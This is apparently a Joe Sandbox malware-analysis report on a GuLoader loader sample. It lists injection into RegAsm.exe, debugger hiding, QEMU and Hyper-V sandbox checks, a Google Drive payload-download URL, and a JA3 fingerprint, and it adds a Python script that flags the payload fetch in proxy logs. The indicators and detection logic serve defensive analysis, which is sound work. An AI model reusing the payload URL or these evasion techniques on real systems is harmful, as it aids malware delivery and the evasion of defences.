            Set-Cookie: NID=511=abKi0BWgcemcd0d8wm9mOlAU2B3arxsDTzzIYttMhyEZI6BWiC6XRhQKgWHtgX8WrOJul08K92QFhtYs9xjnosQK86HWAE8VXopjAbsMkP7rWufpF19a4IJLb_GGIG6TaDkuZEY-t6WXx_m0czyrRfhtLyX5RoUF5UVTrZ9K2D8; expires=Tue, 29-Mar-2022 13:08:50 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
            Accept-Ranges: none
            Vary: Accept-Encoding
            Connection: close
            Transfer-Encoding: chunked
        (At analysis time the Drive link returned 404, so the second-stage payload was not retrieved in this run and the behaviour recorded in this report is the loader's alone.)
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.19107672383.0000000005D83000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.19107672383.0000000005D83000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: RegAsm.exe, 00000005.00000003.16607792811.000000000156A000.00000004.00000001.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Q
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/_a
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodC
        Source: RegAsm.exe, 00000005.00000000.18980633011.0000000001530000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodM
        Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRodg
        Source: WerFault.exe, 00000014.00000003.19075440404.000000000306F000.00000004.00000001.sdmp | String found in binary or memory: https://watson.telemet
        Source: unknown | DNS traffic detected: queries for: drive.google.com
        Source: unknown | HTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49788 version: TLS 1.2
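The request and response above give a network signature that is more specific than any single field: a Google Drive direct-download URL, the IE11/Windows 7 user agent on a WOW64 process, Cache-Control: no-cache, and a TLS client fingerprint that Joe Sandbox has seen with other malware. The Python below is an added example, not code from Joe Sandbox or the report, that runs that combination over constructed proxy-log records. The record layout (dicts with host, uri, user_agent, cache_control, status and ja3 fields) is an assumption; mapping a real Zeek or proxy log onto it is a one-line change.

```python
"""Added example (not from the report): detection logic for the GuLoader payload
fetch over constructed proxy-log records."""
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the report.
C2_HOST = "drive.google.com"
DOWNLOAD_PATH = "/uc"
UA_SEEN = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
JA3_SEEN = "37f463bf4616ecd445d4a1937da06e19"

# Constructed sample records (assumed layout): one matching the report's request
# and its 404 response, one benign browser visit to Drive, one unrelated IE11 request.
LOG = [
    {"ts": "2021-09-27T13:08:50Z", "src": "192.168.11.20", "host": "drive.google.com",
     "method": "GET", "uri": "/uc?export=download&id=1a0WYfccpP_tzw3yrsNqkLeIjHmcdMRod",
     "user_agent": UA_SEEN, "cache_control": "no-cache", "status": 404, "ja3": JA3_SEEN},
    {"ts": "2021-09-27T13:09:12Z", "src": "192.168.11.21", "host": "drive.google.com",
     "method": "GET", "uri": "/drive/my-drive",
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/93.0 Safari/537.36",
     "cache_control": None, "status": 200, "ja3": "cd08e31494f9531f560d64c695473da9"},
    {"ts": "2021-09-27T13:10:03Z", "src": "192.168.11.22", "host": "www.example.com",
     "method": "GET", "uri": "/", "user_agent": UA_SEEN,
     "cache_control": None, "status": 200, "ja3": "b32309a26951912be7dba376398abc3b"},
]


def drive_file_id(uri: str):
    """Return the Drive file id of a direct-download URI (/uc?export=download&id=...), else None."""
    parts = urlsplit(uri)
    if parts.path != DOWNLOAD_PATH:
        return None
    query = parse_qs(parts.query)
    if query.get("export") != ["download"]:
        return None
    ids = query.get("id")
    return ids[0] if ids else None


def score(rec):
    """Collect the indicators a single record satisfies."""
    reasons = []
    file_id = drive_file_id(rec["uri"]) if rec["host"] == C2_HOST else None
    if file_id:
        reasons.append("drive_direct_download")
    if rec["user_agent"] == UA_SEEN:
        reasons.append("ie11_wow64_ua")
    if rec.get("cache_control") == "no-cache":
        reasons.append("no_cache")
    if rec.get("ja3") == JA3_SEEN:
        reasons.append("ja3_seen_with_malware")
    return file_id, reasons


def detect(records, min_reasons=3):
    """A hit needs the Drive direct-download shape plus at least two corroborating
    indicators; payload_served tells the responder whether a second stage landed."""
    hits = []
    for rec in records:
        file_id, reasons = score(rec)
        if "drive_direct_download" in reasons and len(reasons) >= min_reasons:
            hits.append({"src": rec["src"], "file_id": file_id, "reasons": reasons,
                         "payload_served": rec.get("status") == 200})
    return hits


if __name__ == "__main__":
    for hit in detect(LOG):
        print(hit)
```

Two caveats for deployment. The user-agent string on its own is ordinary IE11 on Windows 7 and the JA3 of the Windows TLS stack is shared by many legitimate clients, so neither should fire alone; the combination with a direct-download URL is what is rare. And drive.google.com cannot be blocked, so hunt and block on the extracted file id. A 404, as here, means the file had already been removed when the sample ran and only the loader stage executed.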
        Source: WerFault.exe, 00000014.00000003.18995274342.0000000005CBD000.00000004.00000001.sdmp | Binary or memory string: DWM8And16Bit_DirectDrawCreateEx_CallOut
        Source: Kapitu.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
        Source: Kapitu.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\Kapitu.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01109F9D
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01109DB8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110F7DC
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110DD76
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110E1B8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110E3A7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01108FCA
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_011073F2
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01107807
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110AA77
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110F17C NtProtectVirtualMemory
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01109DB8 NtAllocateVirtualMemory, LoadLibraryA
        Source: Kapitu.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Kapitu.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\Kapitu.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll (the Visual Basic 6 runtime; the VB6 wrapper is the form GuLoader is typically delivered in)
        Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll (reported twice)
        Source: unknown | Process created: C:\Users\user\Desktop\Kapitu.exe 'C:\Users\user\Desktop\Kapitu.exe'
        Source: C:\Users\user\Desktop\Kapitu.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Kapitu.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6972 -s 1356
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6972
        Source: C:\Users\user\Desktop\Kapitu.exe | File created: C:\Users\user\AppData\Local\Temp\~DFAE0A0F3CEED256A7.TMP
        Source: classification engine | Classification label: mal84.troj.evad.winEXE@5/4@1/1
        Source: Window Recorder | Window detected: More than 3 window changes detected

        Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000005.00000002.19109903808.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.18979643782.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.18969783001.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_00403C75 pushfd ; retf | 1_2_00403C76
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_0040487A push esp; iretd | 1_2_00404843
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_0040480A push esp; iretd | 1_2_00404843
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_00405F60 push ss; retf | 1_2_00405F68
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_00404F20 push 00000016h; ret | 1_2_00404F28
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_004033DC push eax; ret | 1_2_004033E9
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_023B5237 push edi; ret | 1_2_023B5238
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_023B2A79 push ss; iretd | 1_2_023B2A7A
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_023B3EE8 push es; ret | 1_2_023B3EEE
Source: C:\Users\user\Desktop\Kapitu.exe | Code function: 1_2_023B6573 pushfd ; iretd | 1_2_023B6574
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01102F3E push ebx; iretd | 5_2_01102FEF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110652C pushad ; ret | 5_2_01106530
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01102F88 push ebx; iretd | 5_2_01102FEF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_011049BD push edx; retf | 5_2_011049D1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01102BFC push edi; retf | 5_2_01102C3F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_011007E5 push ecx; retf | 5_2_011007E6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01102C34 push edi; retf | 5_2_01102C3F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01102EF9 push ebx; iretd | 5_2_01102FEF
Source: C:\Users\user\Desktop\Kapitu.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Kapitu.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Kapitu.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.19110033599.00000000012D0000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Kapitu.exe, 00000001.00000002.17008948712.00000000006E4000.00000004.00000020.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6976 | Thread sleep time: -225000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Kapitu.exe | System information queried: ModuleInformation
Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
Source: WerFault.exe, 00000014.00000002.19103847524.0000000003038000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWX
Source: RegAsm.exe, 00000005.00000000.18970661644.0000000001552000.00000004.00000020.sdmp, WerFault.exe, 00000014.00000003.19097226827.000000000310F000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: Kapitu.exe, 00000001.00000002.17009789446.0000000002C60000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.19110033599.00000000012D0000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: Kapitu.exe, 00000001.00000002.17008948712.00000000006E4000.00000004.00000020.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: WerFault.exe, 00000014.00000003.19097153114.0000000003105000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWC

        Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Kapitu.exe | Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_01109717 mov eax, dword ptr fs:[00000030h] | 5_2_01109717
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110CD70 mov eax, dword ptr fs:[00000030h] | 5_2_0110CD70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110E3A7 mov eax, dword ptr fs:[00000030h] | 5_2_0110E3A7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 5_2_0110D408 mov eax, dword ptr fs:[00000030h] | 5_2_0110D408
Source: C:\Users\user\Desktop\Kapitu.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process queried: DebugPort

        HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\Kapitu.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 1100000
Source: C:\Users\user\Desktop\Kapitu.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Kapitu.exe'
Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: RegAsm.exe, 00000005.00000000.18981440245.0000000001970000.00000002.00020000.sdmp | Binary or memory string: Progmanlock

        Mitre Att&ck Matrix

Numbers in parentheses are the count of matching signatures for that technique in this report.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (112) | Virtualization/Sandbox Evasion (22) | Input Capture (1) | Security Software Discovery (311) | Remote Services | Input Capture (1) | Exfiltration Over Other Network Medium | Encrypted Channel (11) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (112) | LSASS Memory | Virtualization/Sandbox Evasion (22) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | DLL Side-Loading (1) | NTDS | System Information Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (114) | SIM Card Swap | Carrier Billing Fraud |

        Behavior Graph

[Behavior graph image not reproduced; recoverable content follows.]
Behavior Graph ID: 1364; Sample: Kapitu.exe; Start date: 27/09/2021; Architecture: WINDOWS; Score: 84
Top-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Yara detected GuLoader; 2 other signatures
DNS/IP info: prda.aadg.msidentity.com; drive.google.com (142.250.186.110, port 443, local port 49788, GOOGLEUS, United States; contacted by RegAsm.exe)
Process chain: Kapitu.exe (started) -> RegAsm.exe (started) -> WerFault.exe (started), conhost.exe (started)
Signatures on Kapitu.exe: Writes to foreign memory regions; Tries to detect Any.run; Hides threads from debuggers
Signatures on RegAsm.exe: Tries to detect Any.run; Hides threads from debuggers


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

Source | Detection | Scanner | Label
Kapitu.exe | 20% | Virustotal |
Kapitu.exe | 9% | ReversingLabs | Win32.Trojan.Mucc

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

Source | Detection | Scanner | Label
https://watson.telemet | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.186.110 | true | false | | high

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://drive.google.com/ | RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | false | | high
https://drive.google.com/_a | RegAsm.exe, 00000005.00000000.18980291890.00000000014E8000.00000004.00000020.sdmp | false | | high
https://watson.telemet | WerFault.exe, 00000014.00000003.19075440404.000000000306F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

              Contacted IPs


              Public

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.110 | drive.google.com | United States | 15169 | GOOGLEUS | false

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:1364
              Start date:27.09.2021
              Start time:15:06:05
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:Kapitu.exe
              Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name:Suspected Instruction Hammering
Number of new started processes analysed:22
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal84.troj.evad.winEXE@5/4@1/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 60%
              • Number of executed functions: 10
              • Number of non-executed functions: 11
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated
              Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.54.122.82, 51.105.236.244, 20.82.210.154, 52.109.12.18, 40.126.31.8, 20.190.159.134, 40.126.31.139, 40.126.31.141, 40.126.31.137, 20.190.159.138, 40.126.31.1, 20.190.159.132, 104.208.16.94
• Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, arc.msn.com, prod.nexusrules.live.com.akadns.net, login.msa.msidentity.com, www.tm.a.prd.aadg.trafficmanager.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, wdcpalt.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, arc.trafficmanager.net, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, onedsblobprdcus16.centralus.cloudapp.azure.com
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

Time | Type | Description
15:08:49 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
15:12:58 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
JA3 37f463bf4616ecd445d4a1937da06e19 was previously seen with the following samples, all detected as malicious and all contacting 142.250.186.110: SebwAujas5.exe, nxW9yUgdYM.exe, Payment_Advice.exe, cxBR3cCGTw.exe, k5THcVgINl.exe, b2i2IopgOC.exe, G2BPn4a7o1.exe, Dokument VAT I - 85926 09 2021 MAG-8.exe, qOsCIQD1uR.exe, NC7bm1PoKj.exe, p0FDRanFUE.exe, Tt5xbxWwsb.exe, rJPkGz9DpL.exe, GVXEsDOGHX.exe, IAWCl9VgWq.exe, BRl35oWria.exe, UcmKadhoIn.exe, oGLE7fjvYA.exe, ZbhUS5doEw.exe, dEYSAsBcE8.exe

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_8e77c7606944d14a4a77d55b81e0b269ca1184a3_e9e275a3_cbb8e5b7-b486-4e03-a377-23ec05ba81b4\Report.wer
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
              Category:dropped
              Size (bytes):14174
              Entropy (8bit):3.7659925989635616
              Encrypted:false
              SSDEEP:192:0oLiCb1o4zmSaAa403TaU5QPmRtDu76MfAIO8ErPM:a0olSaA4aU++tDu76MfAIO8wPM
              MD5:DA404030CE19F1BBA13D8E4E56253CE9
              SHA1:C5AA9F42085D9805EE411E8482CA3AB8731E6A29
              SHA-256:F5B6655BF5F0FA7CBF328A83AFBA3BAEB22635B5F964C28FA9DFBFD2A9842EBE
              SHA-512:25EE3FEB9BCEF83B3771A591C4A89BCBAC54B6952E0ADFF9E33C14142596DEDE98476354BA821D6F59C11EC6A125EF43D623DF2BFC819FB8B7E4AA8F47B24285
              Malicious:false
              Reputation:low
              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.2.5.5.7.3.4.1.6.3.1.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.2.5.5.7.5.5.0.9.5.8.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.b.8.e.5.b.7.-.b.4.8.6.-.4.e.0.3.-.a.3.7.7.-.2.3.e.c.0.5.b.a.8.1.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.0.c.3.3.6.a.-.e.0.9.2.-.4.d.2.9.-.b.0.9.6.-.3.d.f.3.9.2.a.5.e.8.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.3.c.-.0.0.0.1.-.0.0.1.0.-.7.0.1.8.-.9.2.2.2.a.9.b.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.e.e.8.b.2.5.7.3.f.7.1.e.8.d.5.c.3.e.e.7.e.5.3.a.f.3.e.6.7.7.2.e.0.9.0.d.0.f.3.!.
              C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.dmp
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Mon Sep 27 14:12:54 2021, 0x1205a4 type
              Category:dropped
              Size (bytes):77274
              Entropy (8bit):2.1873454119378852
              Encrypted:false
              SSDEEP:192:b97zc1lXfM++84XRr9WCgyDv6W/GCpjYRz7An5N2aKf3hHddI+ha6GaBPXuwHY7r:b938G+3G9WCPGCWywhfDiZ8PtHY7Kg
              MD5:92E5E849DE9B165B358CAB49E4379A1D
              SHA1:71D4200030C91F2E1973A99279A2E8B0CE9BAC4D
